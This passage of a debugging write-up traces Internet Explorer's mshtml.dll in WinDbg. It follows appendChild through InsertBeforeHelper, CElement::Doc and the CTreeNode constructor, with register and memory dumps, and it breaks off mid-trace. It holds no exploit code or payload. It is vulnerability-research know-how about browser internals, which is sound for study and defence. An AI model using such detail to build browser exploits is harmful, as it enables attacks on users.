0425e768 6a1f2148 1b1dcfd8 00000000 0425e7a4 mshtml!CElement::InsertBeforeHelper
0425e784 6a1f20fe 150e3fd0 1b1dcfd8 00000001 mshtml!CElement::insertBefore+0x3c
0425e7c4 6a1f1436 150e3fd0 1b1dcfd8 0425e850 mshtml!CElement::appendChild+0x3a
0425e7f8 6a32235c 150e3fd0 176bafd0 15284fd8 mshtml!Method_IDispatchpp_IDispatchp+0xcb
0425e86c 6a32c75a 150e3fd0 80010431 00000001 mshtml!CBase::ContextInvokeEx+0x5dc
0425e8bc 6a32c79a 150e3fd0 80010431 00000001 mshtml!CElement::ContextInvokeEx+0x9d
0425e8e8 6a2d3104 150e3fd0 80010431 00000001 mshtml!CInput::VersionedInvokeEx+0x2d
0425e93c 6c75a22a 06fa2fd8 80010431 00000001 mshtml!PlainInvokeEx+0xeb
0425e978 6c75a175 1a6c4d10 80010431 00000409 jscript!IDispatchExInvokeEx2+0x104
0425e9b4 6c75a3f6 1a6c4d10 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a
0425ea74 6c75a4a0 80010431 00000001 00000000 jscript!InvokeDispatchEx+0x98
0425eaa8 6c76d8c8 1a6c4d10 0425eadc 00000001 jscript!VAR::InvokeByName+0x139
0425eaf4 6c76d96f 1a6c4d10 00000001 00000000 jscript!VAR::InvokeDispName+0x7d
0425eb20 6c76e3e7 1a6c4d10 00000000 00000001 jscript!VAR::InvokeByDispID+0xce

From the arguments passed in the backtrace it is clear that the upper layers are just thin wrappers (the original first argument is passed in eax); the real work is done by CElement::InsertBeforeHelper.

1:021> 
eax=150e3fd0 ebx=6a628b0c ecx=150e3fd0 edx=00000000 esi=150e3fd0 edi=00000000
eip=6a1f218d esp=0425e710 ebp=0425e768 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::InsertBeforeHelper+0x1d:
6a1f218d e86ea20b00      call    mshtml!CElement::Doc (6a2ac400)

The first thing this function calls is CElement::Doc, with only ecx passed down.

; public: class CDoc * __thiscall CElement::Doc(void)const
?Doc@CElement@@QBEPAVCDoc@@XZ proc near
mov     eax, [ecx]
mov     edx, [eax+70h]
call    edx
mov     eax, [eax+0Ch]
retn
?Doc@CElement@@QBEPAVCDoc@@XZ endp

As you can see, it simply calls one of the object's virtual functions and then reads a value through the returned pointer.

1:021> t
eax=150e3fd0 ebx=6a628b0c ecx=150e3fd0 edx=00000000 esi=150e3fd0 edi=00000000
eip=6a2ac400 esp=0425e70c ebp=0425e768 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::Doc:
6a2ac400 8b01            mov     eax,dword ptr [ecx]  ds:0023:150e3fd0={mshtml!CBodyElement::`vftable' (6a246670)}
1:021> 
eax=6a246670 ebx=6a628b0c ecx=150e3fd0 edx=00000000 esi=150e3fd0 edi=00000000
eip=6a2ac402 esp=0425e70c ebp=0425e768 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::Doc+0x2:
6a2ac402 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:6a2466e0={mshtml!CElement::SecurityContext (6a2ac3d0)}
1:021> 
eax=6a246670 ebx=6a628b0c ecx=150e3fd0 edx=6a2ac3d0 esi=150e3fd0 edi=00000000
eip=6a2ac405 esp=0425e70c ebp=0425e768 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::Doc+0x5:
6a2ac405 ffd2            call    edx {mshtml!CElement::SecurityContext (6a2ac3d0)}
1:021> ln eax
(6a246670)   mshtml!CBodyElement::`vftable'   |  (6a2a9108)   mshtml!CCaret::`vftable'
Exact matches:
    mshtml!CBodyElement::`vftable' = <no type information>

ecx is still the body (the parent object).

1:021> p
eax=18b1cfe8 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=00000000
eip=6a2ac407 esp=0425e70c ebp=0425e768 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CElement::Doc+0x7:
6a2ac407 8b400c          mov     eax,dword ptr [eax+0Ch] ds:0023:18b1cff4=05ad0680
1:021> dd eax
18b1cfe8  6a2a8c34 00000008 00000001 05ad0680
18b1cff8  00000000 06d62f30 ???????? ????????
18b1d008  ???????? ???????? ???????? ????????
18b1d018  ???????? ???????? ???????? ????????
18b1d028  ???????? ???????? ???????? ????????
18b1d038  ???????? ???????? ???????? ????????
18b1d048  ???????? ???????? ???????? ????????
18b1d058  ???????? ???????? ???????? ????????
1:021> ln poi(eax)
(6a2a8c34)   mshtml!CSecurityContext::`vftable'   |  (6a2a8c44)   mshtml!CInvalidatedSecurityContext::`vftable'
Exact matches:
    mshtml!CSecurityContext::`vftable' = <no type information>

This is the return value after the call; the object returned is actually a CSecurityContext.

1:021> p
eax=18b1cfe8 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=00000000
eip=6a2ac407 esp=0425e70c ebp=0425e768 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CElement::Doc+0x7:
6a2ac407 8b400c          mov     eax,dword ptr [eax+0Ch] ds:0023:18b1cff4=05ad0680
1:021> p
eax=05ad0680 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=00000000
eip=6a2ac40a esp=0425e70c ebp=0425e768 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CElement::Doc+0xa:
6a2ac40a c3              ret
1:021> dd eax
05ad0680  6a2a1e88 00000014 000000b0 00000000
05ad0690  00000000 6a2bb610 05ad0680 054aeb8c
05ad06a0  000040a8 000021e6 054aeba8 00000000
05ad06b0  077d5f88 00000001 00000002 00000000
05ad06c0  00000000 00000000 00000000 00000000
05ad06d0  00000000 07560fc8 04ea8870 00000000
05ad06e0  00000000 00105804 00000000 13fbded8
05ad06f0  00000006 00000005 0000001d 00000000
1:021> ln poi(eax)
(6a2a1e88)   mshtml!CDoc::`vftable'   |  (6a2bb610)   mshtml!CDoc::`vftable'
Exact matches:
    mshtml!CDoc::`vftable' = <no type information>

The value at offset 0xC of the CSecurityContext object is returned, and resolving the symbol shows that it is actually a pointer to the CDoc object. In other words, CElement::Doc simply returns the address of mshtml!Doc; the Doc object represents the root of the HTML DOM tree, i.e. <html></html>.

1:021> 
eax=0425e71c ebx=6a628b0c ecx=150e3fd0 edx=6a2ac916 esi=150e3fd0 edi=00000000
eip=6a1f21a6 esp=0425e710 ebp=0425e768 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::InsertBeforeHelper+0x3c:
6a1f21a6 e8deab0b00      call    mshtml!CElement::GetWindowedMarkupContext (6a2acd89)
1:021> 
eax=06d62f30 ebx=6a628b0c ecx=00000000 edx=6a2ac8f9 esi=150e3fd0 edi=00000000
eip=6a1f21ab esp=0425e710 ebp=0425e768 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::InsertBeforeHelper+0x41:
6a1f21ab 8bd8            mov     ebx,eax
1:021> ln poi(eax)
(6a2a20a8)   mshtml!CMarkup::`vftable'   |  (6a2a21a0)   mshtml!CMarkupPointer::`vftable'
Exact matches:
    mshtml!CMarkup::`vftable' = <no type information>

Clearly this function obtains a pointer to the CMarkup object.

1:021> r
eax=00000000 ebx=06d62f30 ecx=00000000 edx=00000014 esi=150e3fd0 edi=00000000
eip=6a1f220a esp=0425e708 ebp=0425e768 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
mshtml!CElement::InsertBeforeHelper+0xb9:
6a1f220a e831000000      call    mshtml!CElement::GetDOMInsertPosition (6a1f2240)
1:021> ln poi(poi(esp))
(6a246670)   mshtml!CBodyElement::`vftable'   |  (6a2a9108)   mshtml!CCaret::`vftable'
Exact matches:
    mshtml!CBodyElement::`vftable' = <no type information>
1:021> ln poi(poi(esp+4))
(6a2a21a0)   mshtml!CMarkupPointer::`vftable'   |  (6a2a2278)   mshtml!CIPrintCollection::`vftable'
Exact matches:
    mshtml!CMarkupPointer::`vftable' = <no type information>

The addresses of these two objects are passed as its arguments.

Breakpoint 5 hit
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8
eip=6a2bced0 esp=0425e594 ebp=0425e630 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode:
6a2bced0 8bff            mov     edi,edi
1:021> kp
ChildEBP RetAddr  
0425e590 6a210d02 mshtml!CTreeNode::CTreeNode
0425e630 6a1f1c01 mshtml!CMarkup::InsertElementInternal+0x23d
0425e66c 6a1f1b36 mshtml!CDoc::InsertElement+0x8a
0425e700 6a1f2222 mshtml!CCommentElement::`scalar deleting destructor'+0x23e
0425e768 6a1f2148 mshtml!CElement::InsertBeforeHelper+0xd1
0425e784 6a1f20fe mshtml!CElement::insertBefore+0x3c
0425e7c4 6a1f1436 mshtml!CElement::appendChild+0x3a
0425e7f8 6a32235c mshtml!Method_IDispatchpp_IDispatchp+0xcb
0425e86c 6a32c75a mshtml!CBase::ContextInvokeEx+0x5dc
0425e8bc 6a32c79a mshtml!CElement::ContextInvokeEx+0x9d
0425e8e8 6a2d3104 mshtml!CInput::VersionedInvokeEx+0x2d
0425e93c 6c75a22a mshtml!PlainInvokeEx+0xeb
0425e978 6c75a175 jscript!IDispatchExInvokeEx2+0x104
0425e9b4 6c75a3f6 jscript!IDispatchExInvokeEx+0x6a
0425ea74 6c75a4a0 jscript!InvokeDispatchEx+0x98
0425eaa8 6c76d8c8 jscript!VAR::InvokeByName+0x139
0425eaf4 6c76d96f jscript!VAR::InvokeDispName+0x7d
0425eb20 6c76e3e7 jscript!VAR::InvokeByDispID+0xce
0425ecbc 6c765c9d jscript!CScriptRuntime::Run+0x2b80
0425eda4 6c765bfb jscript!ScrFncObj::CallWithFrameOnStack+0xce

Once CTreeNode::CTreeNode has finished executing we can look at the fully initialized data in memory; since the first four bytes of a CTreeNode object are the pointer to the element it belongs to, we just need to grab that value.

1:021> p
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8
eip=6a2bced2 esp=0425e594 ebp=0425e630 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x2:
6a2bced2 55              push    ebp
1:021> 
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8
eip=6a2bced3 esp=0425e590 ebp=0425e630 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x3:
6a2bced3 8bec            mov     ebp,esp
1:021> 
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8
eip=6a2bced5 esp=0425e590 ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x5:
6a2bced5 8a450c          mov     al,byte ptr [ebp+0Ch]      ss:0023:0425e59c=00
1:021> 
eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8
eip=6a2bced8 esp=0425e590 ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x8:
6a2bced8 c0e004          shl     al,4
1:021> 
eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8
eip=6a2bcedb esp=0425e590 ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0xb:
6a2bcedb 324109          xor     al,byte ptr [ecx+9]        ds:0023:127c7fb9=00
1:021> 
eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8
eip=6a2bcede esp=0425e590 ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0xe:
6a2bcede 56              push    esi
1:021> 
eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=0425e660 edi=1af02fd8
eip=6a2bcedf esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0xf:
6a2bcedf 8b7140          mov     esi,dword ptr [ecx+40h] ds:0023:127c7ff0=00000000
1:021> 
eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8
eip=6a2bcee2 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x12:
6a2bcee2 2410            and     al,10h
1:021> 
eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8
eip=6a2bcee4 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x14:
6a2bcee4 304109          xor     byte ptr [ecx+9],al        ds:0023:127c7fb9=00
1:021> 
eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8
eip=6a2bcee7 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x17:
6a2bcee7 8a5109          mov     dl,byte ptr [ecx+9]        ds:0023:127c7fb9=00
1:021> 
eax=127c7f00 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8
eip=6a2bceea esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x1a:
6a2bceea b8ffffffff      mov     eax,0FFFFFFFFh
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8
eip=6a2bceef esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x1f:
6a2bceef 6689410a        mov     word ptr [ecx+0Ah],ax    ds:0023:127c7fba=0000
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8
eip=6a2bcef3 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x23:
6a2bcef3 0bc0            or      eax,eax
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8
eip=6a2bcef5 esp=0425e58c ebp=0425e590 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
mshtml!CTreeNode::CTreeNode+0x25:
6a2bcef5 83e607          and     esi,7
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000000 edi=1af02fd8
eip=6a2bcef8 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x28:
6a2bcef8 83ce08          or      esi,8
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcefb esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x2b:
6a2bcefb 6689410c        mov     word ptr [ecx+0Ch],ax    ds:0023:127c7fbc=0000
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bceff esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode+0x2f:
6a2bceff 83c8ff          or      eax,0FFFFFFFFh
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf02 esp=0425e58c ebp=0425e590 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
mshtml!CTreeNode::CTreeNode+0x32:
6a2bcf02 897140          mov     dword ptr [ecx+40h],esi ds:0023:127c7ff0=00000000
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf05 esp=0425e58c ebp=0425e590 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
mshtml!CTreeNode::CTreeNode+0x35:
6a2bcf05 6689410e        mov     word ptr [ecx+0Eh],ax    ds:0023:127c7fbe=0000
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf09 esp=0425e58c ebp=0425e590 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
mshtml!CTreeNode::CTreeNode+0x39:
6a2bcf09 8939            mov     dword ptr [ecx],edi  ds:0023:127c7fb0=00000000
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf0b esp=0425e58c ebp=0425e590 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
mshtml!CTreeNode::CTreeNode+0x3b:
6a2bcf0b 85ff            test    edi,edi
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf0d esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x3d:
6a2bcf0d 7406            je      mshtml!CTreeNode::CTreeNode+0x45 (6a2bcf15) [br=0]
1:021> 
eax=ffffffff ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf0f esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x3f:
6a2bcf0f 8a4718          mov     al,byte ptr [edi+18h]      ds:0023:1af02ff0=60
1:021> 
eax=ffffff60 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf12 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x42:
6a2bcf12 884108          mov     byte ptr [ecx+8],al        ds:0023:127c7fb8=00
1:021> 
eax=ffffff60 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf15 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x45:
6a2bcf15 8b4508          mov     eax,dword ptr [ebp+8] ss:0023:0425e598=15171fb0
1:021> 
eax=15171fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf18 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x48:
6a2bcf18 894104          mov     dword ptr [ecx+4],eax ds:0023:127c7fb4=00000000
1:021> 
eax=15171fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf1b esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x4b:
6a2bcf1b 85ff            test    edi,edi
1:021> 
eax=15171fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf1d esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x4d:
6a2bcf1d 0f84f15deaff    je      mshtml!CTreeNode::CTreeNode+0x5a (6a162d14) [br=0]
1:021> 
eax=15171fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf23 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x4f:
6a2bcf23 0fb64108        movzx   eax,byte ptr [ecx+8]       ds:0023:127c7fb8=60
1:021> 
eax=00000060 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf27 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x53:
6a2bcf27 e8cd020000      call    mshtml!IsPreLikeTag (6a2bd1f9)
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf2c esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x5c:
6a2bcf2c 85c0            test    eax,eax
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf2e esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x5e:
6a2bcf2e 0f95c0          setne   al
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf31 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x61:
6a2bcf31 c0e003          shl     al,3
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf34 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x64:
6a2bcf34 32c2            xor     al,dl
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf36 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x66:
6a2bcf36 2408            and     al,8
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf38 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x68:
6a2bcf38 32c2            xor     al,dl
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf3a esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x6a:
6a2bcf3a 884109          mov     byte ptr [ecx+9],al        ds:0023:127c7fb9=00
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf3d esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x6d:
6a2bcf3d 85ff            test    edi,edi
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf3f esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x6f:
6a2bcf3f 0f84d65deaff    je      mshtml!CTreeNode::CTreeNode+0x7c (6a162d1b) [br=0]
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf45 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x71:
6a2bcf45 0fb64108        movzx   eax,byte ptr [ecx+8]       ds:0023:127c7fb8=60
1:021> 
eax=00000060 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf49 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTreeNode::CTreeNode+0x75:
6a2bcf49 e8ab020000      call    mshtml!IsPreLikeTag (6a2bd1f9)
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf4e esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x7e:
6a2bcf4e 33d2            xor     edx,edx
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf50 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x80:
6a2bcf50 85c0            test    eax,eax
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf52 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x82:
6a2bcf52 0f95c2          setne   dl
1:021> 
eax=00000000 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf55 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x85:
6a2bcf55 8bc1            mov     eax,ecx
1:021> 
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000000 esi=00000008 edi=1af02fd8
eip=6a2bcf57 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTreeNode::CTreeNode+0x87:
6a2bcf57 33d6            xor     edx,esi
1:021> 
eax=127c7fb0 ebx=00000000 ecx=127c7fb0 edx=00000008 esi=00000008 edi=1af02fd8
eip=6a2bcf59 esp=0425e58c ebp=0425e590 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
